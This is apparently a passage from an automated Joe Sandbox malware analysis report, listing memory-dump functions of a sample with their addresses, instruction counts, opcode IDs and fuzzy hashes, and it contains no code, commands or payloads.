                                                                            • Instruction ID: 7f9a8ba83667a25edb97b7fbd74e96426a801bd769dd8f826f4b39f60237caf2
                                                                            • Opcode Fuzzy Hash: d7c8af078bb74ded600dbc7b857b07d3eac4925ae80691c7ce74143467092594
                                                                            • Instruction Fuzzy Hash: 5131063130D9194FD768EB5CE88A9B977D1EF8932130501BBE48AC7166ED21AC828781
                                                                            Function 00007FFD9BC79A4C Relevance: .1, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 49470b5fb397a8f1160d62e8a11ec312f795d5543469b34a9bd4e045d69185e6
                                                                            • Instruction ID: 249a93c23153a1e7710e3e1f28b7d89206b2512035f0267388d18a2b3991261d
                                                                            • Opcode Fuzzy Hash: 49470b5fb397a8f1160d62e8a11ec312f795d5543469b34a9bd4e045d69185e6
                                                                            • Instruction Fuzzy Hash: BF41E721B0995D5FEBACF7A888BA77862D2EB9C311F450179D40DC32E6DC2C6D418751
                                                                            Function 00007FFD9BC72788 Relevance: .1, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 118bd94ed3dac8eb72a98ae0e2d4bf649e2ff5bea5b8c43d6515051b74bf2ffa
                                                                            • Instruction ID: c330957f039e689569259ad8a75c69a876614a3de9b5d2302bad516ed61559b9
                                                                            • Opcode Fuzzy Hash: 118bd94ed3dac8eb72a98ae0e2d4bf649e2ff5bea5b8c43d6515051b74bf2ffa
                                                                            • Instruction Fuzzy Hash: 5B414921E1E55E8FE778DBA884B16B877A1FF51300F1441F9C05ECB1E6DD38AA818B40
                                                                            Function 00007FFD9BC78A77 Relevance: .1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c8634b9d5dad3604b5c7daa3b8a9af63c45c789f3613a5758be1200dd7a654cb
                                                                            • Instruction ID: f5d735d63d35a2e7ef6e95a233e994b017c259f7525b3d9c5e12b33130e1b2d6
                                                                            • Opcode Fuzzy Hash: c8634b9d5dad3604b5c7daa3b8a9af63c45c789f3613a5758be1200dd7a654cb
                                                                            • Instruction Fuzzy Hash: E941823170C9498FDF9CEF28C8A59A4B3E1FB69315B1501AAD04EC32A6DE35F845CB91
                                                                            Function 00007FFD9BC73A67 Relevance: .1, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 188f102aee9a4dbdfd573341760a5ee4d6fdaf543c2ba5a414b2fc0f706f9549
                                                                            • Instruction ID: 4bb69d2a3fceec26796433366e12f362356c3f81c50534c0b43f4ab4d551cb16
                                                                            • Opcode Fuzzy Hash: 188f102aee9a4dbdfd573341760a5ee4d6fdaf543c2ba5a414b2fc0f706f9549
                                                                            • Instruction Fuzzy Hash: 3641773160D9498FDF9CFF68D4A5EA4B3E1FBA8314B0441AAD04EC3196DE25E945CB81
                                                                            Function 00007FFD9B8C0926 Relevance: .1, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0df7977a59678f62ac7d9e2e86be2da31d4389a62f94404cd61b84f6dfe2ccfd
                                                                            • Instruction ID: 074814e710bf834627fedff1cf7caa63fee35c2da19eaed9206a6687f72fd43a
                                                                            • Opcode Fuzzy Hash: 0df7977a59678f62ac7d9e2e86be2da31d4389a62f94404cd61b84f6dfe2ccfd
                                                                            • Instruction Fuzzy Hash: D8316861F2AD0E0BEBACA76C587527932D2FFC8680B14427BD00CC319BDD28AC064381
                                                                            Function 00007FFD9B88095A Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28c107d8718dc1fc7889001c32e4b8b0aef00f44066503323d0c0038c89af154
                                                                            • Instruction ID: 081dc81eed1850aff7ed1269114cb24f3512f4efffcc2aa2a724c67ae462a4bb
                                                                            • Opcode Fuzzy Hash: 28c107d8718dc1fc7889001c32e4b8b0aef00f44066503323d0c0038c89af154
                                                                            • Instruction Fuzzy Hash: 1531E811B1DD291FE75CB76874AAAF873C1DF49329B1444BBE41EC32E7DD28AC428285
                                                                            Function 00007FFD9BC78B21 Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9db9adf774c97864a8ade82e9aff4adcbc3a5d646c8317e5b6e7b9411db5a0f1
                                                                            • Instruction ID: 3d7d6d61c25bdbfe34e2453e83d2ced7131b2e12a0aa5e493679b6b7a9205725
                                                                            • Opcode Fuzzy Hash: 9db9adf774c97864a8ade82e9aff4adcbc3a5d646c8317e5b6e7b9411db5a0f1
                                                                            • Instruction Fuzzy Hash: 4331A23160C9498FDF9CEF28C8A9DA473E1FB6931171501AED04AC72A6DE35F845CB91
                                                                            Function 00007FFD9BC73B11 Relevance: .1, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cfdab6fbc4627aa11a8bcaa3d05f6d552f828ce71bb8b1a44d61ea076144396c
                                                                            • Instruction ID: a1281320a867cf7358de3870dad75d2815ca656ebd061b3b8ddbdded1070503f
                                                                            • Opcode Fuzzy Hash: cfdab6fbc4627aa11a8bcaa3d05f6d552f828ce71bb8b1a44d61ea076144396c
                                                                            • Instruction Fuzzy Hash: 0A31823160CA498FDF9CEF2CC4A5E64B3E1FBA831470441AED05EC7296DE25E945CB81
                                                                            Function 00007FFD9B880960 Relevance: .1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 56e66dca4a0abde1d215d5349833af7a9d9b433a50ba6f79e1b51c2c709bc58d
                                                                            • Instruction ID: d783548390e0f6de9a04f51fa8855c684ad6d243c6b8348c7fdc3bf25691fd77
                                                                            • Opcode Fuzzy Hash: 56e66dca4a0abde1d215d5349833af7a9d9b433a50ba6f79e1b51c2c709bc58d
                                                                            • Instruction Fuzzy Hash: FD31E711B1DD2D1FE75CB768786AAB863C1DF48329B1444BBE41EC32EBDD28AC424285
                                                                            Function 00007FFD9BC78ABB Relevance: .1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dabefd29f3799337e57e0b830db9efc76c57c4a1eb89b8d4dbf0c73a36c8f26f
                                                                            • Instruction ID: 72a936dc09f6f43bd2e7c831b66c56d0b242acfcb36ab2bd3c08d2b3863bb0b5
                                                                            • Opcode Fuzzy Hash: dabefd29f3799337e57e0b830db9efc76c57c4a1eb89b8d4dbf0c73a36c8f26f
                                                                            • Instruction Fuzzy Hash: A831923160C9498FDF9CEF28C8A9DA4B3E1FB6931171501AED04AC72A6DE35F845CB81
                                                                            Function 00007FFD9BC73AAB Relevance: .1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 63ac126ed1be06db5371635eac01d8588c298a5fbf01200a4474cf18d0b2c419
                                                                            • Instruction ID: fa1354636e9c686acb9b6ba97abe4358038b42c90517f67dd1f9020e21df92c7
                                                                            • Opcode Fuzzy Hash: 63ac126ed1be06db5371635eac01d8588c298a5fbf01200a4474cf18d0b2c419
                                                                            • Instruction Fuzzy Hash: 6831933160C9498FDF9CEF28C4A5EA4B3E1FBA831470441AED04EC7296DE25E941CB81
                                                                            Function 00007FFD9BC7633C Relevance: .1, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7ec39b797514e54b7860269752d9fa88850c38cdb507e78f64b34a2c86fa0bca
                                                                            • Instruction ID: 0c5cdec06ed9909d9ecdb376fdbbe28d83dd03b3b7b38093a95a52e243455393
                                                                            • Opcode Fuzzy Hash: 7ec39b797514e54b7860269752d9fa88850c38cdb507e78f64b34a2c86fa0bca
                                                                            • Instruction Fuzzy Hash: A421F831B1E6094BF3389A7898A507DB7D4FF45314B22053EF4CFD35A2D9247602D646
                                                                            Function 00007FFD9B8B62E2 Relevance: .1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60e0333c4574ddcbb2c83f9509dbc6edd18a6a015c0147f941b49a12ad0e4bbe
                                                                            • Instruction ID: 9cac75e41481e05e2631c172f0ab940b63c92c1c32ba372966d0fffaff844458
                                                                            • Opcode Fuzzy Hash: 60e0333c4574ddcbb2c83f9509dbc6edd18a6a015c0147f941b49a12ad0e4bbe
                                                                            • Instruction Fuzzy Hash: 89218CB1E0D61D4BFB74AB68CC566F9B790EF49720F10017AE04C831A6DA35B9828BC0
                                                                            Function 00007FFD9B881171 Relevance: .1, Instructions: 97COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eefd64a6cb9308d35c814ee504a8efe64e20ad765f78e380a79fab0873c57f88
                                                                            • Instruction ID: f2bf502372fbe1883da98955abc3ba4f756974a9a617f30b4fc673788bf666b3
                                                                            • Opcode Fuzzy Hash: eefd64a6cb9308d35c814ee504a8efe64e20ad765f78e380a79fab0873c57f88
                                                                            • Instruction Fuzzy Hash: 0531A830A0D6998FDB46EB74C8659B97BF1FF5A310B0505FAC05AD71A2DA38A841C750
                                                                            Function 00007FFD9B88360E Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad5fe7e68fae4dd37ef5355f136371f49dfae6a14dd4236beeca5f450b990f28
                                                                            • Instruction ID: 08408f4283c42aefee83cfaf7f1b502bebc8301d5f102f03e6ac47d77b34a660
                                                                            • Opcode Fuzzy Hash: ad5fe7e68fae4dd37ef5355f136371f49dfae6a14dd4236beeca5f450b990f28
                                                                            • Instruction Fuzzy Hash: 1E215321F1ED0D8BEBA8E76CD46567822D2EF9C710F570175E05ED32B2DD38AE414601
                                                                            Function 00007FFD9BC75CA8 Relevance: .1, Instructions: 93COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 823d69a6b469cf5e053cfd51794b64dd0f11c3861cf2394d257e2d5474a7f4f4
                                                                            • Instruction ID: 160b2e085a282b79be792b33dea44248e975e0873ec6f576a8b501fa2388bbe3
                                                                            • Opcode Fuzzy Hash: 823d69a6b469cf5e053cfd51794b64dd0f11c3861cf2394d257e2d5474a7f4f4
                                                                            • Instruction Fuzzy Hash: E121EB71B0DA4E4BDB69E7B894A56ACB3D1FF54310F110279D05DC71E2DE2875068781
                                                                            Function 00007FFD9B880998 Relevance: .1, Instructions: 92COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6eab5c90b7747eeb8ce5fa7cd57afffaf158a2e91881062c0f6307ed1622c0fd
                                                                            • Instruction ID: 91fcfbe275f46c72a3d035eed4a9d5e37073326c2711f1b1497d0d9b0e9fdc36
                                                                            • Opcode Fuzzy Hash: 6eab5c90b7747eeb8ce5fa7cd57afffaf158a2e91881062c0f6307ed1622c0fd
                                                                            • Instruction Fuzzy Hash: EF21F220F19D1D0FF798B76C546AA7972C2EF9C329B5100B9E41EC32EBDD28AC418385
                                                                            Function 00007FFD9BC73888 Relevance: .1, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6b8c976f0150a80ba0e6c884813ba2cb63d2e6173ee33f14b1eb508c7f814d17
                                                                            • Instruction ID: 7ef0bdbb9e319cf335dd67a2fb9103fdaf7d36d2d74e4c08f3f03ba99d128611
                                                                            • Opcode Fuzzy Hash: 6b8c976f0150a80ba0e6c884813ba2cb63d2e6173ee33f14b1eb508c7f814d17
                                                                            • Instruction Fuzzy Hash: D0310D30B1E94ECAEB68DBA484E15BD77B1FF84300F5101BAD02ED71A1DA396B429751
                                                                            Function 00007FFD9B880C25 Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0f438a3b134b2c3e621717aff0e23e61f333d66285c62d2193fee62448cc999
                                                                            • Instruction ID: bce52f1a07565266355f8a103ec76b13b9b9b92a79f0063ac81d3926728d6cd4
                                                                            • Opcode Fuzzy Hash: b0f438a3b134b2c3e621717aff0e23e61f333d66285c62d2193fee62448cc999
                                                                            • Instruction Fuzzy Hash: D4214C36F1DA5D8FE726ABA89C250DC7B60EF85724F0541F3C068CB1D3D93866469390
                                                                            Function 00007FFD9BC7889C Relevance: .1, Instructions: 88COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e75f91d94af4ea7fe586d651f97cd9dc2e39c46bec58d88e952e3de468cb8406
                                                                            • Instruction ID: 681a5b03db9ae1ed58d77ab0d31e9bc4546f04d52faf9d4e199e300b1a809fed
                                                                            • Opcode Fuzzy Hash: e75f91d94af4ea7fe586d651f97cd9dc2e39c46bec58d88e952e3de468cb8406
                                                                            • Instruction Fuzzy Hash: 34314E30E1D50ECEEBB8DBA584A15BD77B1FF44300F510076D21EE31A1DB396A009752
                                                                            Function 00007FFD9B8B2D58 Relevance: .1, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 620efa17180e45d68436ac8437fea1a612cbe8a74acd2c2e6d1aa1413966aa8c
                                                                            • Instruction ID: a57f9d44ad6ff93e7284009e97ccbc141abc7baa1d9f7836bac71522379c822b
                                                                            • Opcode Fuzzy Hash: 620efa17180e45d68436ac8437fea1a612cbe8a74acd2c2e6d1aa1413966aa8c
                                                                            • Instruction Fuzzy Hash: 63210722B1D95E4FF79CBBE9A8B66B46AC1EF58310F090176E50CC21E7DC1929894781
                                                                            Function 00007FFD9B895D59 Relevance: .1, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a18dde00248b92e4eb187b86cfe45ab666948a3feae818ee5773500c94ccb279
                                                                            • Instruction ID: b97ecc97bb7315401cf1db1c9d982fd04a94ac0b82ed5768ed271e2e619cc114
                                                                            • Opcode Fuzzy Hash: a18dde00248b92e4eb187b86cfe45ab666948a3feae818ee5773500c94ccb279
                                                                            • Instruction Fuzzy Hash: D4215E31F1D91E4BFFA5E79884656B926D2EF58310F1601B6C81DD72E2DD38AE028780
                                                                            Function 00007FFD9BC70C1D Relevance: .1, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4acfb07493ff015b291b6b95f359d2b388d16566d243fd6081e3c2841bce2eea
                                                                            • Instruction ID: c709097623558efe1466091db49e6cf5915a496b5ac5e3799ef04cfaae91ca13
                                                                            • Opcode Fuzzy Hash: 4acfb07493ff015b291b6b95f359d2b388d16566d243fd6081e3c2841bce2eea
                                                                            • Instruction Fuzzy Hash: 7021C930B0990ECFDB58EBA8C4A19ACF3A1FF48754B514279D45DD7292CF24B912CB91
                                                                            Function 00007FFD9B8BD9FA Relevance: .1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 724a10dba747b0985f755d2a0a5f04cdbcd92551479fcbfe7e117ff74e9df6d0
                                                                            • Instruction ID: 5df9fbfcba1b6fe87b8128a8e779c8017b6b587295d63620f81acad1d1770799
                                                                            • Opcode Fuzzy Hash: 724a10dba747b0985f755d2a0a5f04cdbcd92551479fcbfe7e117ff74e9df6d0
                                                                            • Instruction Fuzzy Hash: 7021A02270D6565BD709AB3CAC766D577A0EF41219B0881BBC08DCB4D3EA18A44B8784
                                                                            Function 00007FFD9BC74B72 Relevance: .1, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 016dcefc09be7cf85951b339d46c1aedacab6867729190d0a10698288c6e35b3
                                                                            • Instruction ID: be207c7292fdec418e8819428375ff21d753d9bdfcc480a27b2768be7c9503b6
                                                                            • Opcode Fuzzy Hash: 016dcefc09be7cf85951b339d46c1aedacab6867729190d0a10698288c6e35b3
                                                                            • Instruction Fuzzy Hash: 9121FA70A0891D9FDF9CDB68D4A5AECB7B1FF58311F1101AED04EE32A1CA35AA41CB40
                                                                            Function 00007FFD9B8C5068 Relevance: .1, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 690ce1b03a938a822e7ba0fd37f28db8a9e52ac802dfd53c7452258a7a5b8868
                                                                            • Instruction ID: 85030724d71244a292c1ac32ed1ed48ec5adb2dd7a5a07a17876a04b660bc068
                                                                            • Opcode Fuzzy Hash: 690ce1b03a938a822e7ba0fd37f28db8a9e52ac802dfd53c7452258a7a5b8868
                                                                            • Instruction Fuzzy Hash: D3214171B09A094FEB98FB58C4A5B7976E2FBDC314F15413ED04DC32A6CE38A9858741
                                                                            Function 00007FFD9BC77798 Relevance: .1, Instructions: 80COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f602a5cc345b53b7b936619636f1e0fa7ef06fa6e05f7cbe3f8496e60658a2f1
                                                                            • Instruction ID: 740f5eeec3eff608045662685b12a2db7eda72a8789cd395f7d3511a8da11531
                                                                            • Opcode Fuzzy Hash: f602a5cc345b53b7b936619636f1e0fa7ef06fa6e05f7cbe3f8496e60658a2f1
                                                                            • Instruction Fuzzy Hash: 46212910A1E55F4AE33E826484F58B877D1EF5030572645FFC05A8B4ABC82CB985C7A1
                                                                            Function 00007FFD9BC74028 Relevance: .1, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 892a8bb3b8ca93d8e403ac5dd4f312b84e6494300d63dda0143792b36cdf969b
                                                                            • Instruction ID: cb5a3ad64f62a5d12ac0dfaefb6da72b62e7ab92fa1a3e01f27fb5f4aa1b7ff1
                                                                            • Opcode Fuzzy Hash: 892a8bb3b8ca93d8e403ac5dd4f312b84e6494300d63dda0143792b36cdf969b
                                                                            • Instruction Fuzzy Hash: D2213A31E1995EDFDB58DBA8C8A09ADBBB1FF58300F510179D00AE32A1DA246905CB41
                                                                            Function 00007FFD9B890958 Relevance: .1, Instructions: 74COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 497e376dcc4be36c0d11224bdba3cbff52235e703f3de452692fe74d68e8aa88
                                                                            • Instruction ID: 3416771365c53ebba75d5d8b430546efe457513b74b0312e2c864c6528ab889e
                                                                            • Opcode Fuzzy Hash: 497e376dcc4be36c0d11224bdba3cbff52235e703f3de452692fe74d68e8aa88
                                                                            • Instruction Fuzzy Hash: 9811E731A1FA8D4FD725977484349A47BB0EF4A30074A41FAD089CB0F7DE19A986C7A1
                                                                            Function 00007FFD9BC777A0 Relevance: .1, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
